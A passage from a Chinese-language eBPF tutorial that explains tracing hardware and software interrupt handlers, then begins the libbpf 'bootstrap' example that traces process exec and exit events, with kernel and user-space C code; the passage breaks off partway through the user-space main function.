<p>hardirqs 是硬件中断处理程序。当硬件设备产生一个中断请求时,内核会将该请求映射到一个特定的中断向量,然后执行与之关联的硬件中断处理程序。硬件中断处理程序通常用于处理设备驱动程序中的事件,例如设备数据传输完成或设备错误。</p>
|
||
<p>softirqs 是软件中断处理程序。它们是内核中的一种底层异步事件处理机制,用于处理内核中的高优先级任务。softirqs 通常用于处理网络协议栈、磁盘子系统和其他内核组件中的事件。与硬件中断处理程序相比,软件中断处理程序具有更高的灵活性和可配置性。</p>
|
||
<h2 id="实现原理"><a class="header" href="#实现原理">实现原理</a></h2>
|
||
<p>在 eBPF 中,我们可以通过挂载特定的 kprobe 或者 tracepoint 来捕获和分析 hardirqs 和 softirqs。为了捕获 hardirqs 和 softirqs,需要在相关的内核函数上放置 eBPF 程序。这些函数包括:</p>
|
||
<ul>
|
||
<li>对于 hardirqs:irq_handler_entry 和 irq_handler_exit。</li>
|
||
<li>对于 softirqs:softirq_entry 和 softirq_exit。</li>
|
||
</ul>
|
||
<p>当内核处理 hardirqs 或 softirqs 时,这些 eBPF 程序会被执行,从而收集相关信息,如中断向量、中断处理程序的执行时间等。收集到的信息可以用于分析内核中的性能问题和其他与中断处理相关的问题。</p>
|
||
<p>为了捕获 hardirqs 和 softirqs,可以遵循以下步骤:</p>
|
||
<ol>
|
||
<li>在 eBPF 程序中定义用于存储中断信息的数据结构和映射。</li>
|
||
<li>编写 eBPF 程序,将其挂载到相应的内核函数上,以捕获 hardirqs 或 softirqs。</li>
|
||
<li>在 eBPF 程序中,收集中断处理程序的相关信息,并将这些信息存储在映射中。</li>
|
||
<li>在用户空间应用程序中,读取映射中的数据以分析和展示中断处理信息。</li>
|
||
</ol>
|
||
<p>通过上述方法,我们可以在 eBPF 中使用 hardirqs 和 softirqs 捕获和分析内核中的中断事件,以识别潜在的性能问题和与中断处理相关的问题。</p>
|
||
<h2 id="hardirqs-代码实现"><a class="header" href="#hardirqs-代码实现">hardirqs 代码实现</a></h2>
|
||
<p>hardirqs 程序的主要目的是获取中断处理程序的名称、执行次数和执行时间,并以直方图的形式展示执行时间的分布。让我们一步步分析这段代码。</p>
|
||
<pre><code class="language-c">// SPDX-License-Identifier: GPL-2.0
|
||
// Copyright (c) 2020 Wenbo Zhang
|
||
#include <vmlinux.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include "hardirqs.h"
|
||
#include "bits.bpf.h"
|
||
#include "maps.bpf.h"
|
||
|
||
#define MAX_ENTRIES 256
|
||
|
||
const volatile bool filter_cg = false;
|
||
const volatile bool targ_dist = false;
|
||
const volatile bool targ_ns = false;
|
||
const volatile bool do_count = false;
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_CGROUP_ARRAY);
|
||
__type(key, u32);
|
||
__type(value, u32);
|
||
__uint(max_entries, 1);
|
||
} cgroup_map SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_PERCPU_ARRAY);
|
||
__uint(max_entries, 1);
|
||
__type(key, u32);
|
||
__type(value, u64);
|
||
} start SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, MAX_ENTRIES);
|
||
__type(key, struct irq_key);
|
||
__type(value, struct info);
|
||
} infos SEC(".maps");
|
||
|
||
static struct info zero;
|
||
|
||
static int handle_entry(int irq, struct irqaction *action)
|
||
{
|
||
if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0))
|
||
return 0;
|
||
|
||
if (do_count) {
|
||
struct irq_key key = {};
|
||
struct info *info;
|
||
|
||
bpf_probe_read_kernel_str(&key.name, sizeof(key.name), BPF_CORE_READ(action, name));
|
||
info = bpf_map_lookup_or_try_init(&infos, &key, &zero);
|
||
if (!info)
|
||
return 0;
|
||
info->count += 1;
|
||
return 0;
|
||
} else {
|
||
u64 ts = bpf_ktime_get_ns();
|
||
u32 key = 0;
|
||
|
||
if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0))
|
||
return 0;
|
||
|
||
bpf_map_update_elem(&start, &key, &ts, BPF_ANY);
|
||
return 0;
|
||
}
|
||
}
|
||
|
||
static int handle_exit(int irq, struct irqaction *action)
|
||
{
|
||
struct irq_key ikey = {};
|
||
struct info *info;
|
||
u32 key = 0;
|
||
u64 delta;
|
||
u64 *tsp;
|
||
|
||
if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0))
|
||
return 0;
|
||
|
||
tsp = bpf_map_lookup_elem(&start, &key);
|
||
if (!tsp)
|
||
return 0;
|
||
|
||
delta = bpf_ktime_get_ns() - *tsp;
|
||
if (!targ_ns)
|
||
delta /= 1000U;
|
||
|
||
bpf_probe_read_kernel_str(&ikey.name, sizeof(ikey.name), BPF_CORE_READ(action, name));
|
||
info = bpf_map_lookup_or_try_init(&infos, &ikey, &zero);
|
||
if (!info)
|
||
return 0;
|
||
|
||
if (!targ_dist) {
|
||
info->count += delta;
|
||
} else {
|
||
u64 slot;
|
||
|
||
slot = log2(delta);
|
||
if (slot >= MAX_SLOTS)
|
||
slot = MAX_SLOTS - 1;
|
||
info->slots[slot]++;
|
||
}
|
||
|
||
return 0;
|
||
}
|
||
|
||
SEC("tp_btf/irq_handler_entry")
|
||
int BPF_PROG(irq_handler_entry_btf, int irq, struct irqaction *action)
|
||
{
|
||
return handle_entry(irq, action);
|
||
}
|
||
|
||
SEC("tp_btf/irq_handler_exit")
|
||
int BPF_PROG(irq_handler_exit_btf, int irq, struct irqaction *action)
|
||
{
|
||
return handle_exit(irq, action);
|
||
}
|
||
|
||
SEC("raw_tp/irq_handler_entry")
|
||
int BPF_PROG(irq_handler_entry, int irq, struct irqaction *action)
|
||
{
|
||
return handle_entry(irq, action);
|
||
}
|
||
|
||
SEC("raw_tp/irq_handler_exit")
|
||
int BPF_PROG(irq_handler_exit, int irq, struct irqaction *action)
|
||
{
|
||
return handle_exit(irq, action);
|
||
}
|
||
|
||
char LICENSE[] SEC("license") = "GPL";
|
||
</code></pre>
|
||
<p>这段代码是一个 eBPF 程序,用于捕获和分析内核中硬件中断处理程序(hardirqs)的执行信息。程序的主要目的是获取中断处理程序的名称、执行次数和执行时间,并以直方图的形式展示执行时间的分布。让我们一步步分析这段代码。</p>
|
||
<ol>
|
||
<li>
|
||
<p>包含必要的头文件和定义数据结构:</p>
|
||
<pre><code class="language-c">#include <vmlinux.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include "hardirqs.h"
|
||
#include "bits.bpf.h"
|
||
#include "maps.bpf.h"
|
||
</code></pre>
|
||
<p>该程序包含了 eBPF 开发所需的标准头文件,以及用于定义数据结构和映射的自定义头文件。</p>
|
||
</li>
|
||
<li>
|
||
<p>定义全局变量和映射:</p>
|
||
<pre><code class="language-c">
|
||
#define MAX_ENTRIES 256
|
||
|
||
const volatile bool filter_cg = false;
|
||
const volatile bool targ_dist = false;
|
||
const volatile bool targ_ns = false;
|
||
const volatile bool do_count = false;
|
||
|
||
...
|
||
</code></pre>
|
||
<p>该程序定义了一些全局变量,用于配置程序的行为。例如,<code>filter_cg</code> 控制是否过滤 cgroup,<code>targ_dist</code> 控制是否显示执行时间的分布等。此外,程序还定义了三个映射,分别用于存储 cgroup 信息、开始时间戳和中断处理程序的信息。</p>
|
||
</li>
|
||
<li>
|
||
<p>定义两个辅助函数 <code>handle_entry</code> 和 <code>handle_exit</code>:</p>
|
||
<p>这两个函数分别在中断处理程序的入口和出口处被调用。<code>handle_entry</code> 记录开始时间戳或更新中断计数,<code>handle_exit</code> 计算中断处理程序的执行时间,并将结果存储到相应的信息映射中。</p>
|
||
</li>
|
||
<li>
|
||
<p>定义 eBPF 程序的入口点:</p>
|
||
<pre><code class="language-c">
|
||
SEC("tp_btf/irq_handler_entry")
|
||
int BPF_PROG(irq_handler_entry_btf, int irq, struct irqaction *action)
|
||
{
|
||
return handle_entry(irq, action);
|
||
}
|
||
|
||
SEC("tp_btf/irq_handler_exit")
|
||
int BPF_PROG(irq_handler_exit_btf, int irq, struct irqaction *action)
|
||
{
|
||
return handle_exit(irq, action);
|
||
}
|
||
|
||
SEC("raw_tp/irq_handler_entry")
|
||
int BPF_PROG(irq_handler_entry, int irq, struct irqaction *action)
|
||
{
|
||
return handle_entry(irq, action);
|
||
}
|
||
|
||
SEC("raw_tp/irq_handler_exit")
|
||
int BPF_PROG(irq_handler_exit, int irq, struct irqaction *action)
|
||
{
|
||
return handle_exit(irq, action);
|
||
}
|
||
</code></pre>
|
||
<p>这里定义了四个 eBPF 程序入口点,分别用于捕获中断处理程序的入口和出口事件。<code>tp_btf</code> 和 <code>raw_tp</code> 分别代表使用 BPF Type Format(BTF)和原始 tracepoints 捕获事件。这样可以确保程序在不同内核版本上可以移植和运行。</p>
|
||
</li>
|
||
</ol>
|
||
<p>Softirq 代码也类似,这里就不再赘述了。</p>
|
||
<h2 id="运行代码"><a class="header" href="#运行代码">运行代码</a></h2>
|
||
<p>eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 <a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。</p>
|
||
<p>要编译这个程序,请使用 ecc 工具:</p>
|
||
<pre><code class="language-console">$ ecc hardirqs.bpf.c
|
||
Compiling bpf object...
|
||
Packing ebpf object and config into package.json...
|
||
</code></pre>
|
||
<p>然后运行:</p>
|
||
<pre><code class="language-console">sudo ecli run ./package.json
|
||
</code></pre>
|
||
<h2 id="总结-9"><a class="header" href="#总结-9">总结</a></h2>
|
||
<p>在本章节(eBPF 入门开发实践教程十:在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件)中,我们学习了如何使用 eBPF 程序捕获和分析内核中硬件中断处理程序(hardirqs)的执行信息。我们详细讲解了示例代码,包括如何定义数据结构、映射以及 eBPF 程序入口点,以及如何在中断处理程序的入口和出口处调用辅助函数来记录执行信息。</p>
|
||
<p>通过学习本章节内容,您应该已经掌握了如何在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件的方法,以及如何分析这些事件以识别内核中的性能问题和其他与中断处理相关的问题。这些技能对于分析和优化 Linux 内核的性能至关重要。</p>
|
||
<p>为了更好地理解和实践 eBPF 编程,我们建议您阅读 eunomia-bpf 的官方文档:<a href="https://github.com/eunomia-bpf/eunomia-bpf">https://github.com/eunomia-bpf/eunomia-bpf</a> 。此外,我们还为您提供了完整的教程和源代码,您可以在 <a href="https://github.com/eunomia-bpf/bpf-developer-tutorial">https://github.com/eunomia-bpf/bpf-developer-tutorial</a> 中查看和学习。希望本教程能够帮助您顺利入门 eBPF 开发,并为您的进一步学习和实践提供有益的参考。</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="ebpf-入门开发实践教程十一在-ebpf-中使用-libbpf-开发用户态程序并跟踪-exec-和-exit-系统调用"><a class="header" href="#ebpf-入门开发实践教程十一在-ebpf-中使用-libbpf-开发用户态程序并跟踪-exec-和-exit-系统调用">eBPF 入门开发实践教程十一:在 eBPF 中使用 libbpf 开发用户态程序并跟踪 exec() 和 exit() 系统调用</a></h1>
|
||
<p>eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。</p>
|
||
<p>在本教程中,我们将了解内核态和用户态的 eBPF 程序是如何协同工作的。我们还将学习如何使用原生的 libbpf 开发用户态程序,将 eBPF 应用打包为可执行文件,实现跨内核版本分发。</p>
|
||
<h2 id="libbpf-库以及为什么需要使用它"><a class="header" href="#libbpf-库以及为什么需要使用它">libbpf 库,以及为什么需要使用它</a></h2>
|
||
<p>libbpf 是一个 C 语言库,伴随内核版本分发,用于辅助 eBPF 程序的加载和运行。它提供了用于与 eBPF 系统交互的一组 C API,使开发者能够更轻松地编写用户态程序来加载和管理 eBPF 程序。这些用户态程序通常用于分析、监控或优化系统性能。</p>
|
||
<p>使用 libbpf 库有以下优势:</p>
|
||
<ul>
|
||
<li>它简化了 eBPF 程序的加载、更新和运行过程。</li>
|
||
<li>它提供了一组易于使用的 API,使开发者能够专注于编写核心逻辑,而不是处理底层细节。</li>
|
||
<li>它能够确保与内核中的 eBPF 子系统的兼容性,降低了维护成本。</li>
|
||
</ul>
|
||
<p>同时,libbpf 和 BTF(BPF Type Format)都是 eBPF 生态系统的重要组成部分。它们各自在实现跨内核版本兼容方面发挥着关键作用。BTF(BPF Type Format)是一种元数据格式,用于描述 eBPF 程序中的类型信息。BTF 的主要目的是提供一种结构化的方式,以描述内核中的数据结构,以便 eBPF 程序可以更轻松地访问和操作它们。</p>
|
||
<p>BTF 在实现跨内核版本兼容方面的关键作用如下:</p>
|
||
<ul>
|
||
<li>BTF 允许 eBPF 程序访问内核数据结构的详细类型信息,而无需对特定内核版本进行硬编码。这使得 eBPF 程序可以适应不同版本的内核,从而实现跨内核版本兼容。</li>
|
||
<li>通过使用 BPF CO-RE(Compile Once, Run Everywhere)技术,eBPF 程序可以利用 BTF 在编译时解析内核数据结构的类型信息,进而生成可以在不同内核版本上运行的 eBPF 程序。</li>
|
||
</ul>
|
||
<p>结合 libbpf 和 BTF,eBPF 程序可以在各种不同版本的内核上运行,而无需为每个内核版本单独编译。这极大地提高了 eBPF 生态系统的可移植性和兼容性,降低了开发和维护的难度。</p>
|
||
<h2 id="什么是-bootstrap"><a class="header" href="#什么是-bootstrap">什么是 bootstrap</a></h2>
|
||
<p>Bootstrap 是一个使用 libbpf 的完整应用,它利用 eBPF 程序来跟踪内核中的 exec() 系统调用(通过 SEC("tp/sched/sched_process_exec") handle_exec BPF 程序),这主要对应于新进程的创建(不包括 fork() 部分)。此外,它还跟踪进程的 exit() 系统调用(通过 SEC("tp/sched/sched_process_exit") handle_exit BPF 程序),以了解每个进程何时退出。</p>
|
||
<p>这两个 BPF 程序共同工作,允许捕获关于新进程的有趣信息,例如二进制文件的文件名,以及测量进程的生命周期,并在进程结束时收集有趣的统计信息,例如退出代码或消耗的资源量等。这是深入了解内核内部并观察事物如何真正运作的良好起点。</p>
|
||
<p>Bootstrap 还使用 argp API(libc 的一部分)进行命令行参数解析,使得用户可以通过命令行选项配置应用行为。这种方式提供了灵活性,让用户能够根据实际需求自定义程序行为。虽然这些功能使用 eunomia-bpf 工具也可以实现,但是这里我们使用 libbpf 可以在用户态提供更高的可扩展性,不过也带来了不少额外的复杂度。</p>
|
||
<h2 id="bootstrap"><a class="header" href="#bootstrap">Bootstrap</a></h2>
|
||
<p>Bootstrap 分为两个部分:内核态和用户态。内核态部分是一个 eBPF 程序,它跟踪 exec() 和 exit() 系统调用。用户态部分是一个 C 语言程序,它使用 libbpf 库来加载和运行内核态程序,并处理从内核态程序收集的数据。</p>
|
||
<h3 id="内核态-ebpf-程序-bootstrapbpfc"><a class="header" href="#内核态-ebpf-程序-bootstrapbpfc">内核态 eBPF 程序 bootstrap.bpf.c</a></h3>
|
||
<pre><code class="language-c">// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause
|
||
/* Copyright (c) 2020 Facebook */
|
||
#include "vmlinux.h"
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include "bootstrap.h"
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, 8192);
|
||
__type(key, pid_t);
|
||
__type(value, u64);
|
||
} exec_start SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_RINGBUF);
|
||
__uint(max_entries, 256 * 1024);
|
||
} rb SEC(".maps");
|
||
|
||
const volatile unsigned long long min_duration_ns = 0;
|
||
|
||
SEC("tp/sched/sched_process_exec")
|
||
int handle_exec(struct trace_event_raw_sched_process_exec *ctx)
|
||
{
|
||
struct task_struct *task;
|
||
unsigned fname_off;
|
||
struct event *e;
|
||
pid_t pid;
|
||
u64 ts;
|
||
|
||
/* remember time exec() was executed for this PID */
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
ts = bpf_ktime_get_ns();
|
||
bpf_map_update_elem(&exec_start, &pid, &ts, BPF_ANY);
|
||
|
||
/* don't emit exec events when minimum duration is specified */
|
||
if (min_duration_ns)
|
||
return 0;
|
||
|
||
/* reserve sample from BPF ringbuf */
|
||
e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
|
||
if (!e)
|
||
return 0;
|
||
|
||
/* fill out the sample with data */
|
||
task = (struct task_struct *)bpf_get_current_task();
|
||
|
||
e->exit_event = false;
|
||
e->pid = pid;
|
||
e->ppid = BPF_CORE_READ(task, real_parent, tgid);
|
||
bpf_get_current_comm(&e->comm, sizeof(e->comm));
|
||
|
||
fname_off = ctx->__data_loc_filename & 0xFFFF;
|
||
bpf_probe_read_str(&e->filename, sizeof(e->filename), (void *)ctx + fname_off);
|
||
|
||
/* successfully submit it to user-space for post-processing */
|
||
bpf_ringbuf_submit(e, 0);
|
||
return 0;
|
||
}
|
||
|
||
SEC("tp/sched/sched_process_exit")
|
||
int handle_exit(struct trace_event_raw_sched_process_template* ctx)
|
||
{
|
||
struct task_struct *task;
|
||
struct event *e;
|
||
pid_t pid, tid;
|
||
u64 id, ts, *start_ts, duration_ns = 0;
|
||
|
||
/* get PID and TID of exiting thread/process */
|
||
id = bpf_get_current_pid_tgid();
|
||
pid = id >> 32;
|
||
tid = (u32)id;
|
||
|
||
/* ignore thread exits */
|
||
if (pid != tid)
|
||
return 0;
|
||
|
||
/* if we recorded start of the process, calculate lifetime duration */
|
||
start_ts = bpf_map_lookup_elem(&exec_start, &pid);
|
||
if (start_ts)
|
||
duration_ns = bpf_ktime_get_ns() - *start_ts;
|
||
else if (min_duration_ns)
|
||
return 0;
|
||
bpf_map_delete_elem(&exec_start, &pid);
|
||
|
||
/* if process didn't live long enough, return early */
|
||
if (min_duration_ns && duration_ns < min_duration_ns)
|
||
return 0;
|
||
|
||
/* reserve sample from BPF ringbuf */
|
||
e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
|
||
if (!e)
|
||
return 0;
|
||
|
||
/* fill out the sample with data */
|
||
task = (struct task_struct *)bpf_get_current_task();
|
||
|
||
e->exit_event = true;
|
||
e->duration_ns = duration_ns;
|
||
e->pid = pid;
|
||
e->ppid = BPF_CORE_READ(task, real_parent, tgid);
|
||
e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff;
|
||
bpf_get_current_comm(&e->comm, sizeof(e->comm));
|
||
|
||
/* send data to user-space for post-processing */
|
||
bpf_ringbuf_submit(e, 0);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>这段代码是一个内核态 eBPF 程序(bootstrap.bpf.c),主要用于跟踪 exec() 和 exit() 系统调用。它通过 eBPF 程序捕获进程的创建和退出事件,并将相关信息发送到用户态程序进行处理。下面是对代码的详细解释。</p>
|
||
<p>首先,我们引入所需的头文件,定义 eBPF 程序的许可证以及两个 eBPF maps:exec_start 和 rb。exec_start 是一个哈希类型的 eBPF map,用于存储进程开始执行时的时间戳。rb 是一个环形缓冲区类型的 eBPF map,用于存储捕获的事件数据,并将其发送到用户态程序。</p>
|
||
<pre><code class="language-c">#include "vmlinux.h"
|
||
#include <bpf/bpf_helpers.h>
|
||
#include <bpf/bpf_tracing.h>
|
||
#include <bpf/bpf_core_read.h>
|
||
#include "bootstrap.h"
|
||
|
||
char LICENSE[] SEC("license") = "Dual BSD/GPL";
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_HASH);
|
||
__uint(max_entries, 8192);
|
||
__type(key, pid_t);
|
||
__type(value, u64);
|
||
} exec_start SEC(".maps");
|
||
|
||
struct {
|
||
__uint(type, BPF_MAP_TYPE_RINGBUF);
|
||
__uint(max_entries, 256 * 1024);
|
||
} rb SEC(".maps");
|
||
|
||
const volatile unsigned long long min_duration_ns = 0;
|
||
</code></pre>
|
||
<p>接下来,我们定义了一个名为 handle_exec 的 eBPF 程序,它会在进程执行 exec() 系统调用时触发。首先,我们从当前进程中获取 PID,记录进程开始执行的时间戳,然后将其存储在 exec_start map 中。</p>
|
||
<pre><code class="language-c">SEC("tp/sched/sched_process_exec")
|
||
int handle_exec(struct trace_event_raw_sched_process_exec *ctx)
|
||
{
|
||
// ...
|
||
pid = bpf_get_current_pid_tgid() >> 32;
|
||
ts = bpf_ktime_get_ns();
|
||
bpf_map_update_elem(&exec_start, &pid, &ts, BPF_ANY);
|
||
|
||
// ...
|
||
}
|
||
</code></pre>
|
||
<p>然后,我们从环形缓冲区 map rb 中预留一个事件结构,并填充相关数据,如进程 ID、父进程 ID、进程名等。之后,我们将这些数据发送到用户态程序进行处理。</p>
|
||
<pre><code class="language-c"> // reserve sample from BPF ringbuf
|
||
e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
|
||
if (!e)
|
||
return 0;
|
||
|
||
// fill out the sample with data
|
||
task = (struct task_struct *)bpf_get_current_task();
|
||
|
||
e->exit_event = false;
|
||
e->pid = pid;
|
||
e->ppid = BPF_CORE_READ(task, real_parent, tgid);
|
||
bpf_get_current_comm(&e->comm, sizeof(e->comm));
|
||
|
||
fname_off = ctx->__data_loc_filename & 0xFFFF;
|
||
bpf_probe_read_str(&e->filename, sizeof(e->filename), (void *)ctx + fname_off);
|
||
|
||
// successfully submit it to user-space for post-processing
|
||
bpf_ringbuf_submit(e, 0);
|
||
return 0;
|
||
</code></pre>
|
||
<p>最后,我们定义了一个名为 handle_exit 的 eBPF 程序,它会在进程执行 exit() 系统调用时触发。首先,我们从当前进程中获取 PID 和 TID(线程 ID)。如果 PID 和 TID 不相等,说明这是一个线程退出,我们将忽略此事件。</p>
|
||
<pre><code class="language-c">SEC("tp/sched/sched_process_exit")
|
||
int handle_exit(struct trace_event_raw_sched_process_template* ctx)
|
||
{
|
||
// ...
|
||
id = bpf_get_current_pid_tgid();
|
||
pid = id >> 32;
|
||
tid = (u32)id;
|
||
|
||
/* ignore thread exits */
|
||
if (pid != tid)
|
||
return 0;
|
||
|
||
// ...
|
||
}
|
||
</code></pre>
|
||
<p>接着,我们查找之前存储在 exec_start map 中的进程开始执行的时间戳。如果找到了时间戳,我们将计算进程的生命周期(持续时间),然后从 exec_start map 中删除该记录。如果未找到时间戳且指定了最小持续时间,则直接返回。</p>
|
||
<pre><code class="language-c"> // if we recorded start of the process, calculate lifetime duration
|
||
start_ts = bpf_map_lookup_elem(&exec_start, &pid);
|
||
if (start_ts)
|
||
duration_ns = bpf_ktime_get_ns() - *start_ts;
|
||
else if (min_duration_ns)
|
||
return 0;
|
||
bpf_map_delete_elem(&exec_start, &pid);
|
||
|
||
// if process didn't live long enough, return early
|
||
if (min_duration_ns && duration_ns < min_duration_ns)
|
||
return 0;
|
||
</code></pre>
|
||
<p>然后,我们从环形缓冲区 map rb 中预留一个事件结构,并填充相关数据,如进程 ID、父进程 ID、进程名、进程持续时间等。最后,我们将这些数据发送到用户态程序进行处理。</p>
|
||
<pre><code class="language-c"> /* reserve sample from BPF ringbuf */
|
||
e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0);
|
||
if (!e)
|
||
return 0;
|
||
|
||
/* fill out the sample with data */
|
||
task = (struct task_struct *)bpf_get_current_task();
|
||
|
||
e->exit_event = true;
|
||
e->duration_ns = duration_ns;
|
||
e->pid = pid;
|
||
e->ppid = BPF_CORE_READ(task, real_parent, tgid);
|
||
e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff;
|
||
bpf_get_current_comm(&e->comm, sizeof(e->comm));
|
||
|
||
/* send data to user-space for post-processing */
|
||
bpf_ringbuf_submit(e, 0);
|
||
return 0;
|
||
}
|
||
</code></pre>
|
||
<p>这样,当进程执行 exec() 或 exit() 系统调用时,我们的 eBPF 程序会捕获相应的事件,并将详细信息发送到用户态程序进行后续处理。这使得我们可以轻松地监控进程的创建和退出,并获取有关进程的详细信息。</p>
|
||
<p>除此之外,在 bootstrap.h 中,我们还定义了和用户态交互的数据结构:</p>
|
||
<pre><code class="language-c">/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */
|
||
/* Copyright (c) 2020 Facebook */
|
||
#ifndef __BOOTSTRAP_H
|
||
#define __BOOTSTRAP_H
|
||
|
||
#define TASK_COMM_LEN 16
|
||
#define MAX_FILENAME_LEN 127
|
||
|
||
struct event {
|
||
int pid;
|
||
int ppid;
|
||
unsigned exit_code;
|
||
unsigned long long duration_ns;
|
||
char comm[TASK_COMM_LEN];
|
||
char filename[MAX_FILENAME_LEN];
|
||
bool exit_event;
|
||
};
|
||
|
||
#endif /* __BOOTSTRAP_H */
|
||
</code></pre>
|
||
<h3 id="用户态bootstrapc"><a class="header" href="#用户态bootstrapc">用户态,bootstrap.c</a></h3>
|
||
<pre><code class="language-c">// SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause)
|
||
/* Copyright (c) 2020 Facebook */
|
||
#include <argp.h>
|
||
#include <signal.h>
|
||
#include <stdio.h>
|
||
#include <time.h>
|
||
#include <sys/resource.h>
|
||
#include <bpf/libbpf.h>
|
||
#include "bootstrap.h"
|
||
#include "bootstrap.skel.h"
|
||
|
||
static struct env {
|
||
bool verbose;
|
||
long min_duration_ms;
|
||
} env;
|
||
|
||
const char *argp_program_version = "bootstrap 0.0";
|
||
const char *argp_program_bug_address = "<bpf@vger.kernel.org>";
|
||
const char argp_program_doc[] =
|
||
"BPF bootstrap demo application.\n"
|
||
"\n"
|
||
"It traces process start and exits and shows associated \n"
|
||
"information (filename, process duration, PID and PPID, etc).\n"
|
||
"\n"
|
||
"USAGE: ./bootstrap [-d <min-duration-ms>] [-v]\n";
|
||
|
||
static const struct argp_option opts[] = {
|
||
{ "verbose", 'v', NULL, 0, "Verbose debug output" },
|
||
{ "duration", 'd', "DURATION-MS", 0, "Minimum process duration (ms) to report" },
|
||
{},
|
||
};
|
||
|
||
static error_t parse_arg(int key, char *arg, struct argp_state *state)
|
||
{
|
||
switch (key) {
|
||
case 'v':
|
||
env.verbose = true;
|
||
break;
|
||
case 'd':
|
||
errno = 0;
|
||
env.min_duration_ms = strtol(arg, NULL, 10);
|
||
if (errno || env.min_duration_ms <= 0) {
|
||
fprintf(stderr, "Invalid duration: %s\n", arg);
|
||
argp_usage(state);
|
||
}
|
||
break;
|
||
case ARGP_KEY_ARG:
|
||
argp_usage(state);
|
||
break;
|
||
default:
|
||
return ARGP_ERR_UNKNOWN;
|
||
}
|
||
return 0;
|
||
}
|
||
|
||
static const struct argp argp = {
|
||
.options = opts,
|
||
.parser = parse_arg,
|
||
.doc = argp_program_doc,
|
||
};
|
||
|
||
static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args)
|
||
{
|
||
if (level == LIBBPF_DEBUG && !env.verbose)
|
||
return 0;
|
||
return vfprintf(stderr, format, args);
|
||
}
|
||
|
||
static volatile bool exiting = false;
|
||
|
||
static void sig_handler(int sig)
|
||
{
|
||
exiting = true;
|
||
}
|
||
|
||
static int handle_event(void *ctx, void *data, size_t data_sz)
|
||
{
|
||
const struct event *e = data;
|
||
struct tm *tm;
|
||
char ts[32];
|
||
time_t t;
|
||
|
||
time(&t);
|
||
tm = localtime(&t);
|
||
strftime(ts, sizeof(ts), "%H:%M:%S", tm);
|
||
|
||
if (e->exit_event) {
|
||
printf("%-8s %-5s %-16s %-7d %-7d [%u]",
|
||
ts, "EXIT", e->comm, e->pid, e->ppid, e->exit_code);
|
||
if (e->duration_ns)
|
||
printf(" (%llums)", e->duration_ns / 1000000);
|
||
printf("\n");
|
||
} else {
|
||
printf("%-8s %-5s %-16s %-7d %-7d %s\n",
|
||
ts, "EXEC", e->comm, e->pid, e->ppid, e->filename);
|
||
}
|
||
|
||
return 0;
|
||
}
|
||
|
||
int main(int argc, char **argv)
|
||
{
|
||
struct ring_buffer *rb = NULL;
|
||
struct bootstrap_bpf *skel;
|
||
int err;
|
||
|
||
/* Parse command line arguments */
|
||
err = argp_parse(&argp, argc, argv, 0, NULL, NULL);
|
||
if (err)
|
||
return err;
|
||
|
||
/* Set up libbpf errors and debug info callback */
|
||
libbpf_set_print(libbpf_print_fn);
|
||
|
||
/* Cleaner handling of Ctrl-C */
|
||
signal(SIGINT, sig_handler);
|
||
signal(SIGTERM, sig_handler);
|
||
|
||
/* Load and verify BPF application */
|
||
skel = bootstrap_bpf__open();
|
||
if (!skel) {
|
||
fprintf(stderr, "Failed to open and load BPF skeleton\n");
|
||
return 1;
|
||
}
|
||
|
||
/* Parameterize BPF code with minimum duration parameter */
|
||
skel->rodata->min_duration_ns = env.min_duration_ms * 1000000ULL;
|
||
|
||
/* Load & verify BPF programs */
|
||
err = bootstrap_bpf__load(skel);
|
||
if (err) {
|
||
fprintf(stderr, "Failed to load and verify BPF skeleton\n");
|
||
goto cleanup;
|
||
}
|
||
|
||
/* Attach tracepoints */
|
||
err = bootstrap_bpf__attach(skel);
|
||
if (err) {
|
||
fprintf(stderr, "Failed to attach BPF skeleton\n");
|
||
goto cleanup;
|
||
}
|
||
|
||
/* Set up ring buffer polling */
|
||
rb = ring_buffer__new(bpf_map__fd(skel->maps.rb), handle_event, NULL, NULL);
|
||
if (!rb) {
|
||
err = -1;
|
||
fprintf(stderr, "Failed to create ring buffer\n");
|
||
goto cleanup;
|
||
}
|
||
|
||
/* Process events */
|
||
